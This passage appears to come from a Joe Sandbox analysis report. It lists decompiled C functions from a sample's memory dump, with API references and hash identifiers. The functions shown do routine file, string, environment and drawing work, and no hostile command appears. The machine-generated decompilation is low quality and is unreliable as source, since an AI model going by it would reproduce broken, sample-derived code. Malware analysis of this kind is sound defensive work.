				signed int* _t57;
				struct _FILETIME* _t67;
				void* _t81;
				CHAR* _t82;
				signed int* _t83;
				void* _t86;

				_t83 = _a4;
				_t81 = __ecx;
				E00412140(_t83, 0, 0x128);
				lstrcpynA( &(_t83[8]),  *(_t81 + 0xc), 0x104);
				_t43 =  *(_t81 + 4);
				_t86 = _t43 -  *0x44aa04; // 0xffffffff
				if(_t86 == 0) {
					L12:
					return 1;
				}
				_t67 =  &_v12;
				if(GetFileTime(_t43, _t67,  &_v20,  &_v28) == 0) {
					L4:
					return 0;
				}
				_t48 = GetFileSize( *(_t81 + 4), 0);
				_t83[6] = _t48;
				_t83[7] = 0;
				if(_t48 != 0xffffffff || 0 != 0) {
					_t82 =  *(_t81 + 0xc);
					if( *((intOrPtr*)(_t82 - 0xc)) != 0) {
						_t83[8] = (_t67 & 0xffffff00 | GetFileAttributesA(_t82) == 0xffffffff) - 0x00000001 & _t49;
					} else {
						_t83[8] = 0;
					}
					_t51 = E00411904( &_v36,  &_v12, 0xffffffff);
					 *_t83 =  *_t51;
					_t83[1] = _t51[1];
					_t54 = E00411904( &_v36,  &_v20, 0xffffffff);
					_t83[4] =  *_t54;
					_t83[5] = _t54[1];
					_t57 = E00411904( &_v36,  &_v28, 0xffffffff);
					_t83[2] =  *_t57;
					_t83[3] = _t57[1];
					if(( *_t83 | _t83[1]) == 0) {
						 *_t83 =  *_t57;
						_t83[1] = _t57[1];
					}
					if((_t83[4] | _t83[5]) == 0) {
						_t83[4] = _t83[2];
						_t83[5] = _t83[3];
					}
					goto L12;
				} else {
					goto L4;
				}
			}

















                                                                              0x00429eb1
                                                                              0x00429ebe
                                                                              0x00429ec0
                                                                              0x00429ed4
                                                                              0x00429eda
                                                                              0x00429edd
                                                                              0x00429ee3
                                                                              0x00429fb0
                                                                              0x00000000
                                                                              0x00429fb2
                                                                              0x00429ef1
                                                                              0x00429efe
                                                                              0x00429f19
                                                                              0x00000000
                                                                              0x00429f19
                                                                              0x00429f04
                                                                              0x00429f0d
                                                                              0x00429f10
                                                                              0x00429f13
                                                                              0x00429f20
                                                                              0x00429f26
                                                                              0x00429f3e
                                                                              0x00429f28
                                                                              0x00429f28
                                                                              0x00429f28
                                                                              0x00429f4a
                                                                              0x00429f51
                                                                              0x00429f56
                                                                              0x00429f62
                                                                              0x00429f69
                                                                              0x00429f6f
                                                                              0x00429f7b
                                                                              0x00429f82
                                                                              0x00429f88
                                                                              0x00429f90
                                                                              0x00429f94
                                                                              0x00429f99
                                                                              0x00429f99
                                                                              0x00429fa2
                                                                              0x00429fa7
                                                                              0x00429fad
                                                                              0x00429fad
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              APIs
                                                                              • lstrcpynA.KERNEL32(?,?,00000104), ref: 00429ED4
                                                                              • GetFileTime.KERNEL32(?,?,?,?), ref: 00429EF6
                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 00429F04
                                                                              • GetFileAttributesA.KERNEL32(?), ref: 00429F2E
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesSizeTimelstrcpyn
                                                                              • String ID:
                                                                              • API String ID: 1499663573-0
                                                                              • Opcode ID: 0113b6ad1a6e328eadc19bc36d6ba990eb9bd09bf14dc4cde13f113dc8000afa
                                                                              • Instruction ID: b3638a9b2c079d9a11e0c6508daf2b90498c7c79d710f6d215663869c41547e3
                                                                              • Opcode Fuzzy Hash: 0113b6ad1a6e328eadc19bc36d6ba990eb9bd09bf14dc4cde13f113dc8000afa
                                                                              • Instruction Fuzzy Hash: 52413CB56006149FCB24DF64D981CAAB7F8FB083107144A2EE1A6D36A0E774ED44CB54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040D649, Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 29%
                                                                              			E0040D649(void* _a4, intOrPtr _a8) {
				char _v8;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				intOrPtr _t39;
				intOrPtr* _t41;
				intOrPtr* _t47;
				intOrPtr _t48;
				intOrPtr* _t49;
				intOrPtr _t58;
				intOrPtr* _t60;
				void* _t71;

				_t71 = _a4 + 0xffffff2c;
				if( *((intOrPtr*)(_t71 + 0x84)) != 0) {
					return 0;
				}
				_t58 = _a8;
				if( *((intOrPtr*)(_t71 + 0x8c)) != 0) {
					L4:
					if( *((intOrPtr*)(_t71 + 0x98)) == _t58) {
						__imp__#9(_t71 + 0xa8);
						_t41 =  *((intOrPtr*)(_t71 + 0x4c));
						_push( &_a4);
						_push(0x44dd5c);
						_a4 = 0;
						_push(_t41);
						if( *((intOrPtr*)( *_t41))() >= 0) {
							E00412140( &_v56, 0, 0x20);
							E00412140( &_v24, 0, 0x10);
							_t47 = _a4;
							_t48 =  *((intOrPtr*)( *_t47 + 0x18))(_t47, _t58, 0x44ddcc, 0, 2,  &_v24, _t71 + 0xa8,  &_v56,  &_v8);
							_t60 = __imp__#6;
							_a8 = _t48;
							if(_v52 != 0) {
								 *_t60(_v52);
							}
							if(_v48 != 0) {
								 *_t60(_v48);
							}
							if(_v44 != 0) {
								 *_t60(_v44);
							}
							_t49 = _a4;
							 *((intOrPtr*)( *_t49 + 8))(_t49);
							if(_a8 >= 0) {
								 *((intOrPtr*)(_t71 + 0xa4)) = 1;
							}
						}
					}
					_t39 = 0;
					goto L15;
				} else {
					_v60 = 2;
					_v56 = _t58;
					_v52 = 0;
					_v48 = 0;
					_v44 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					E0040BBC8(_t71,  &_v60);
					_t39 = _v36;
					if(_t39 != 0) {
						L15:
						return _t39;
					}
					goto L4;
				}
			}





















                                                                              0x0040d654
                                                                              0x0040d662
                                                                              0x00000000
                                                                              0x0040d664
                                                                              0x0040d672
                                                                              0x0040d675
                                                                              0x0040d6a9
                                                                              0x0040d6af
                                                                              0x0040d6bc
                                                                              0x0040d6c2
                                                                              0x0040d6c8
                                                                              0x0040d6c9
                                                                              0x0040d6ce
                                                                              0x0040d6d3
                                                                              0x0040d6d8
                                                                              0x0040d6e1
                                                                              0x0040d6ed
                                                                              0x0040d6f2
                                                                              0x0040d717
                                                                              0x0040d71d
                                                                              0x0040d723
                                                                              0x0040d726
                                                                              0x0040d72b
                                                                              0x0040d72b
                                                                              0x0040d730
                                                                              0x0040d735
                                                                              0x0040d735
                                                                              0x0040d73a
                                                                              0x0040d73f
                                                                              0x0040d73f
                                                                              0x0040d741
                                                                              0x0040d747
                                                                              0x0040d74d
                                                                              0x0040d74f
                                                                              0x0040d74f
                                                                              0x0040d74d
                                                                              0x0040d6d8
                                                                              0x0040d759
                                                                              0x00000000
                                                                              0x0040d677
                                                                              0x0040d67d
                                                                              0x0040d684
                                                                              0x0040d687
                                                                              0x0040d68a
                                                                              0x0040d68d
                                                                              0x0040d690
                                                                              0x0040d693
                                                                              0x0040d696
                                                                              0x0040d699
                                                                              0x0040d69e
                                                                              0x0040d6a3
                                                                              0x0040d75b
                                                                              0x00000000
                                                                              0x0040d75b
                                                                              0x00000000
                                                                              0x0040d6a3

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: FreeString$ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 3349467263-0
                                                                              • Opcode ID: 5ae85c25e3d071020b53a15fd6199ebd0278086df464616def237aaadf58b1f3
                                                                              • Instruction ID: 6a27d367007baa36b2ebf87ec83dbd574f20471f744cd8e8dae629828e7ae737
                                                                              • Opcode Fuzzy Hash: 5ae85c25e3d071020b53a15fd6199ebd0278086df464616def237aaadf58b1f3
                                                                              • Instruction Fuzzy Hash: 53310871D10219EFCB04DFA5CC84ADEBB78BF08714F10852AF519A7290C7B4A948CFA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004155EC, Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 79%
                                                                              			E004155EC(void* __ecx, void* __eflags) {
				void* _t55;

				E00412ABE(__ecx, __eflags);
				 *((intOrPtr*)(_t55 - 0x1c)) = 0;
				 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
				__eflags =  *(__ebp - 0x1c);
				if( *(__ebp - 0x1c) != 0) {
					L5:
					__eax = WideCharToMultiByte( *(__ebp + 0x20), __ebx,  *(__ebp + 0x10),  *(__ebp + 0x14),  *(__ebp - 0x1c),  *(__ebp - 0x20), __ebx, __ebx);
					__eflags = __eax;
					if(__eax == 0) {
						L21:
						__edi =  *(__ebp - 0x34);
						L22:
						__eflags =  *(__ebp - 0x28) - __ebx;
						if( *(__ebp - 0x28) != __ebx) {
							__eax = E00412A4D();
							__ecx = __edi;
						}
						__eflags =  *((intOrPtr*)(__ebp - 0x2c)) - __ebx;
						if( *((intOrPtr*)(__ebp - 0x2c)) != __ebx) {
							_push( *(__ebp - 0x1c));
							__eax = E00412A4D();
							_pop(__ecx);
						}
						__eax =  *(__ebp - 0x24);
						L27:
						return E00412BDF(0);
					}
					__eax = LCMapStringA( *(__ebp + 8),  *(__ebp + 0xc),  *(__ebp - 0x1c),  *(__ebp - 0x20), __ebx, __ebx);
					__esi = __eax;
					 *(__ebp - 0x30) = __esi;
					__eflags = __esi - __ebx;
					if(__esi == __ebx) {
						goto L21;
					}
					 *(__ebp - 4) = __edi;
					__eax =  &(__eax[3]);
					__eax = E00412260(__eax, __ecx);
					 *(__ebp - 0x18) = __esp;
					__edi = __esp;
					 *(__ebp - 0x34) = __edi;
					 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
					__eflags = __edi - __ebx;
					if(__edi != __ebx) {
						L11:
						__eax = LCMapStringA( *(__ebp + 8),  *(__ebp + 0xc),  *(__ebp - 0x1c),  *(__ebp - 0x20), __edi, __esi);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags =  *(__ebp + 0xd) & 0x00000004;
							if(( *(__ebp + 0xd) & 0x00000004) == 0) {
								__eflags =  *(__ebp + 0x1c) - __ebx;
								if( *(__ebp + 0x1c) != __ebx) {
									_push( *(__ebp + 0x1c));
									_push( *((intOrPtr*)(__ebp + 0x18)));
								} else {
									_push(__ebx);
									_push(__ebx);
								}
								 *(__ebp - 0x24) = MultiByteToWideChar( *(__ebp + 0x20), 1, __edi, __esi, ??, ??);
							} else {
								 *(__ebp - 0x24) = __esi;
								__eflags =  *(__ebp + 0x1c) - __ebx;
								if( *(__ebp + 0x1c) != __ebx) {
									__eflags =  *(__ebp + 0x1c) - __esi;
									if( *(__ebp + 0x1c) < __esi) {
										__esi =  *(__ebp + 0x1c);
									}
									__eax = E0041ADB0( *((intOrPtr*)(__ebp + 0x18)), __edi, __esi);
								}
							}
						}
						goto L22;
					} else {
						__edi = E00412247(__esi);
						__eflags = __edi - __ebx;
						if(__edi == __ebx) {
							goto L22;
						}
						 *(__ebp - 0x28) = 1;
						goto L11;
					}
				} else {
					__eax = E00412247( *(__ebp - 0x20));
					 *(__ebp - 0x1c) = __eax;
					__eflags = __eax;
					if(__eax == 0) {
						goto L1;
					}
					 *((intOrPtr*)(__ebp - 0x2c)) = 1;
					goto L5;
				}
				L1:
				goto L27;
			}




                                                                              0x004155ef
                                                                              0x004155f6
                                                                              0x004155f9
                                                                              0x00415600
                                                                              0x00415603
                                                                              0x00415618
                                                                              0x0041562a
                                                                              0x00415630
                                                                              0x00415632
                                                                              0x00415702
                                                                              0x00415702
                                                                              0x00415705
                                                                              0x00415705
                                                                              0x00415708
                                                                              0x0041570b
                                                                              0x00415710
                                                                              0x00415710
                                                                              0x00415711
                                                                              0x00415714
                                                                              0x00415716
                                                                              0x00415719
                                                                              0x0041571e
                                                                              0x0041571e
                                                                              0x0041571f
                                                                              0x00415722
                                                                              0x0041572a
                                                                              0x0041572a
                                                                              0x00415646
                                                                              0x0041564c
                                                                              0x0041564e
                                                                              0x00415651
                                                                              0x00415653
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415659
                                                                              0x0041565c
                                                                              0x00415662
                                                                              0x00415667
                                                                              0x0041566a
                                                                              0x0041566c
                                                                              0x0041566f
                                                                              0x0041568c
                                                                              0x0041568e
                                                                              0x004156a4
                                                                              0x004156b2
                                                                              0x004156b8
                                                                              0x004156ba
                                                                              0x004156bc
                                                                              0x004156c0
                                                                              0x004156e1
                                                                              0x004156e4
                                                                              0x004156ea
                                                                              0x004156ed
                                                                              0x004156e6
                                                                              0x004156e6
                                                                              0x004156e7
                                                                              0x004156e7
                                                                              0x004156fd
                                                                              0x004156c2
                                                                              0x004156c2
                                                                              0x004156c5
                                                                              0x004156c8
                                                                              0x004156ca
                                                                              0x004156cd
                                                                              0x004156cf
                                                                              0x004156cf
                                                                              0x004156d7
                                                                              0x004156dc
                                                                              0x004156c8
                                                                              0x004156c0
                                                                              0x00000000
                                                                              0x00415690
                                                                              0x00415697
                                                                              0x00415699
                                                                              0x0041569b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041569d
                                                                              0x00000000
                                                                              0x0041569d
                                                                              0x00415605
                                                                              0x00415608
                                                                              0x0041560e
                                                                              0x00415611
                                                                              0x00415613
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415615
                                                                              0x00000000
                                                                              0x00415615
                                                                              0x004155c5
                                                                              0x00000000

                                                                              APIs
                                                                                • Part of subcall function 00412ABE: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00412AD8
                                                                                • Part of subcall function 00412ABE: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00412AE9
                                                                                • Part of subcall function 00412ABE: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 00412B2F
                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000), ref: 0041562A
                                                                              • LCMapStringA.KERNEL32(?,?,?,?,00000000,00000000), ref: 00415646
                                                                              • LCMapStringA.KERNEL32(?,?,?,?,?,00000000), ref: 004156B2
                                                                              • _strncpy.LIBCMT ref: 004156D7
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: QueryStringVirtual$ByteCharInfoMultiSystemWide_strncpy
                                                                              • String ID:
                                                                              • API String ID: 1411509361-0
                                                                              • Opcode ID: 4354bf144ba335751284bb2eb5b789406234b68ace3f3828ab28ab0f93c93f63
                                                                              • Instruction ID: e32128493025af66ab0669425dedd777a8228e03adaffc0c72913b367a0b79d5
                                                                              • Opcode Fuzzy Hash: 4354bf144ba335751284bb2eb5b789406234b68ace3f3828ab28ab0f93c93f63
                                                                              • Instruction Fuzzy Hash: 4F315C72C00559EBCF119FE5DD818EE7BB5FF89314F14802AF624621A0C73949A1DF98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041F66A, Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 87%
                                                                              			E0041F66A(void* __ecx, void* __eflags) {
				short* _t40;
				intOrPtr _t42;
				int _t57;
				short* _t64;
				int _t67;
				void* _t68;
				short* _t69;

				_t58 = __ecx;
				_t69 =  *(_t68 - 0x18);
				E00412ABE(__ecx, __eflags);
				 *(_t68 - 0x34) =  *(_t68 - 0x34) & 0x00000000;
				 *(_t68 - 4) =  *(_t68 - 4) | 0xffffffff;
				_t57 =  *(_t68 - 0x48);
				_t40 =  *(_t68 - 0x34);
				if(_t40 != 0) {
					L4:
					if(MultiByteToWideChar( *(_t68 + 0x20), 1,  *(_t68 + 0x10),  *(_t68 + 0x14), _t40, _t57) != 0) {
						_t67 = MultiByteToWideChar( *(_t68 + 0x20), 9,  *(_t68 + 0x18),  *(_t68 + 0x1c), 0, 0);
						 *(_t68 - 0x4c) = _t67;
						if(_t67 != 0) {
							 *(_t68 - 4) = 1;
							E00412260(_t67 + _t67 + 0x00000003 & 0xfffffffc, _t58);
							 *(_t68 - 0x18) = _t69;
							_t64 = _t69;
							 *(_t68 - 0x50) = _t64;
							 *(_t68 - 4) =  *(_t68 - 4) | 0xffffffff;
							if(_t64 != 0) {
								L10:
								if(MultiByteToWideChar( *(_t68 + 0x20), 1,  *(_t68 + 0x18),  *(_t68 + 0x1c), _t64, _t67) != 0) {
									 *((intOrPtr*)(_t68 - 0x40)) = CompareStringW( *(_t68 + 8),  *(_t68 + 0xc),  *(_t68 - 0x34), _t57, _t64, _t67);
								}
								if( *(_t68 - 0x44) != 0) {
									_push(_t64);
									E00412A4D();
								}
							} else {
								_t64 = E00412247(_t67 + _t67);
								if(_t64 != 0) {
									 *(_t68 - 0x44) = 1;
									goto L10;
								}
							}
						}
					}
					if( *((intOrPtr*)(_t68 - 0x3c)) != 0) {
						_push( *(_t68 - 0x34));
						E00412A4D();
					}
					_t42 =  *((intOrPtr*)(_t68 - 0x40));
				} else {
					_t40 = E00412247(_t57 + _t57);
					_pop(_t58);
					 *(_t68 - 0x34) = _t40;
					if(_t40 == 0) {
						_t42 = 0;
					} else {
						 *((intOrPtr*)(_t68 - 0x3c)) = 1;
						goto L4;
					}
				}
				return E00412BDF(E00412FBB(_t42,  *((intOrPtr*)(_t68 - 0x1c))));
			}










                                                                              0x0041f66a
                                                                              0x0041f66a
                                                                              0x0041f66d
                                                                              0x0041f672
                                                                              0x0041f676
                                                                              0x0041f67a
                                                                              0x0041f682
                                                                              0x0041f687
                                                                              0x0041f6a1
                                                                              0x0041f6b5
                                                                              0x0041f6d0
                                                                              0x0041f6d2
                                                                              0x0041f6d7
                                                                              0x0041f6dd
                                                                              0x0041f6ed
                                                                              0x0041f6f2
                                                                              0x0041f6f5
                                                                              0x0041f6f7
                                                                              0x0041f6fa
                                                                              0x0041f71a
                                                                              0x0041f733
                                                                              0x0041f748
                                                                              0x0041f75c
                                                                              0x0041f75c
                                                                              0x0041f763
                                                                              0x0041f765
                                                                              0x0041f766
                                                                              0x0041f76b
                                                                              0x0041f71c
                                                                              0x0041f726
                                                                              0x0041f72a
                                                                              0x0041f72c
                                                                              0x00000000
                                                                              0x0041f72c
                                                                              0x0041f72a
                                                                              0x0041f71a
                                                                              0x0041f6d7
                                                                              0x0041f770
                                                                              0x0041f772
                                                                              0x0041f775
                                                                              0x0041f77a
                                                                              0x0041f77b
                                                                              0x0041f689
                                                                              0x0041f68d
                                                                              0x0041f692
                                                                              0x0041f693
                                                                              0x0041f698
                                                                              0x0041f7b0
                                                                              0x0041f69e
                                                                              0x0041f69e
                                                                              0x00000000
                                                                              0x0041f69e
                                                                              0x0041f698
                                                                              0x0041f841

                                                                              APIs
                                                                                • Part of subcall function 00412ABE: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00412AD8
                                                                                • Part of subcall function 00412ABE: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00412AE9
                                                                                • Part of subcall function 00412ABE: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 00412B2F
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,0041D89C,00000000,00000000,00000000,00000000,00000000,00000000,0041A597,0044CC0C), ref: 0041F6AD
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,0041188E,00000000,00000000,?,0041D89C,00000000,00000000,00000000,00000000,00000000,00000000,0041A597,0044CC0C), ref: 0041F6CA
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,0041188E,?,00000000,?,0041D89C,00000000,00000000,00000000,00000000,00000000,00000000,0041A597,0044CC0C), ref: 0041F740
                                                                              • CompareStringW.KERNEL32(?,?,00000190,00000000,?,00000000,?,00000000,?,0041D89C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041F756
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$QueryVirtual$CompareInfoStringSystem
                                                                              • String ID:
                                                                              • API String ID: 1997773198-0
                                                                              • Opcode ID: e4dac6fd1e1db323bef1e37bec62b7fef285bbc2a59e921a58e49f5016fa505d
                                                                              • Instruction ID: 2df65f9f423b14ef46bf1b1cc5de3305eadf03fa0e2f559cb83695ed31fa3782
                                                                              • Opcode Fuzzy Hash: e4dac6fd1e1db323bef1e37bec62b7fef285bbc2a59e921a58e49f5016fa505d
                                                                              • Instruction Fuzzy Hash: 30318F31801618EBDF219FA0DE45BDE7F75EF04714F20012AF924A62A0C77889A6CB84
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00417502, Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 94%
                                                                              			E00417502() {
				void* __ebp;
				signed int _t5;
				intOrPtr _t6;
				signed int _t11;
				void* _t12;
				signed int _t13;
				signed int _t24;
				signed int _t25;
				intOrPtr* _t26;
				char* _t27;
				void* _t30;
				intOrPtr _t32;

				_t32 =  *0x45be8c; // 0x1
				if(_t32 == 0) {
					_t5 = E00413A27();
				}
				_t26 =  *0x45a3e0; // 0x0
				_t24 = 0;
				if(_t26 != 0) {
					while(1) {
						_t6 =  *_t26;
						if(_t6 == 0) {
							break;
						}
						if(_t6 != 0x3d) {
							_t24 = _t24 + 1;
						}
						_t26 = _t26 + E00411A30(_t26) + 1;
					}
					_t5 = E00412247(4 + _t24 * 4);
					_t25 = _t5;
					 *0x45a410 = _t25;
					if(_t25 != 0) {
						_t27 =  *0x45a3e0; // 0x0
						while( *_t27 != 0) {
							_t30 = E00411A30(_t27) + 1;
							if( *_t27 == 0x3d) {
								L14:
								_t27 = _t27 + _t30;
								continue;
							}
							_t12 = E00412247(_t30);
							 *_t25 = _t12;
							if(_t12 == 0) {
								_push( *0x45a410);
								_t13 = E00412A4D();
								 *0x45a410 = 0;
								_t11 = _t13 | 0xffffffff;
								L17:
								return _t11;
							}
							E00419460(_t12, _t27);
							_t25 = _t25 + 4;
							goto L14;
						}
						_push( *0x45a3e0);
						E00412A4D();
						 *0x45a3e0 = 0;
						 *_t25 = 0;
						 *0x45be80 = 1;
						_t11 = 0;
						goto L17;
					}
					goto L9;
				} else {
					L9:
					return _t5 | 0xffffffff;
				}
			}















                                                                              0x00417505
                                                                              0x0041750d
                                                                              0x0041750f
                                                                              0x0041750f
                                                                              0x00417514
                                                                              0x0041751a
                                                                              0x0041751e
                                                                              0x00417532
                                                                              0x00417532
                                                                              0x00417536
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417524
                                                                              0x00417526
                                                                              0x00417526
                                                                              0x0041752e
                                                                              0x0041752e
                                                                              0x00417540
                                                                              0x00417545
                                                                              0x0041754a
                                                                              0x00417550
                                                                              0x00417557
                                                                              0x0041758a
                                                                              0x00417568
                                                                              0x0041756d
                                                                              0x00417588
                                                                              0x00417588
                                                                              0x00000000
                                                                              0x00417588
                                                                              0x00417570
                                                                              0x00417578
                                                                              0x0041757a
                                                                              0x004175b3
                                                                              0x004175b9
                                                                              0x004175be
                                                                              0x004175c4
                                                                              0x004175ad
                                                                              0x00000000
                                                                              0x004175ae
                                                                              0x0041757e
                                                                              0x00417585
                                                                              0x00000000
                                                                              0x00417585
                                                                              0x0041758e
                                                                              0x00417594
                                                                              0x00417599
                                                                              0x0041759f
                                                                              0x004175a1
                                                                              0x004175ab
                                                                              0x00000000
                                                                              0x004175ab
                                                                              0x00000000
                                                                              0x00417520
                                                                              0x00417552
                                                                              0x00000000
                                                                              0x00417552

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: _strlen$___initmbctable_strcat
                                                                              • String ID:
                                                                              • API String ID: 109824703-0
                                                                              • Opcode ID: 9a27cef034060f0b8fc8fab9bb8f45732d89598e3fa73e993d896ec4d4ffa2d2
                                                                              • Instruction ID: e4378317086149e0ba5dc4709b9ab4935a166bb8b379aec355851efaa0c11858
                                                                              • Opcode Fuzzy Hash: 9a27cef034060f0b8fc8fab9bb8f45732d89598e3fa73e993d896ec4d4ffa2d2
                                                                              • Instruction Fuzzy Hash: BD11667204D610AAC7206F21AC445E63BA6FB023A9324073FF191836A2DB3D98D1C78D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040D29E, Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 81%
                                                                              			E0040D29E(void* __edi) {
				intOrPtr _t35;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t50;
				signed int _t60;
				void* _t63;

				E004128A0(E0043114F, _t63);
				_t60 = 0;
				 *((intOrPtr*)(_t63 - 0x10)) = 0;
				 *((intOrPtr*)(_t63 - 0x14)) = 0x44ada0;
				_t48 =  *((intOrPtr*)(_t63 + 8));
				 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x14)))) = 0;
				 *(_t63 - 4) = 0;
				if( *((intOrPtr*)(_t48 - 8)) == 0) {
					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t48 - 0xac)) + 0x1c)) + 0x1c)));
					_t35 = E0042A726();
					 *((intOrPtr*)(_t48 - 8)) = _t35;
					if(_t35 == 0) {
						goto L1;
					} else {
						if( *(_t63 + 0xc) != 0) {
							IntersectRect(_t63 - 0x24, _t48 - 0x9c,  *(_t63 + 0xc));
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t60 = 0;
						}
						E0042AA1B(_t63 - 0x14, CreateRectRgnIndirect(_t63 - 0x24));
						E0042A590( *((intOrPtr*)(_t48 - 8)), _t63 - 0x14, 1);
						_t50 =  *((intOrPtr*)(_t48 - 8));
						if(_t50 != _t60) {
							_t46 =  *((intOrPtr*)(_t50 + 4));
						} else {
							_t46 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x14)))) = _t46;
					}
				} else {
					L1:
					_t60 = 0x80004005;
				}
				 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t63 - 0x14)) = 0x44a720;
				E0042AA72(_t63 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
				return _t60;
			}









                                                                              0x0040d2a3
                                                                              0x0040d2ad
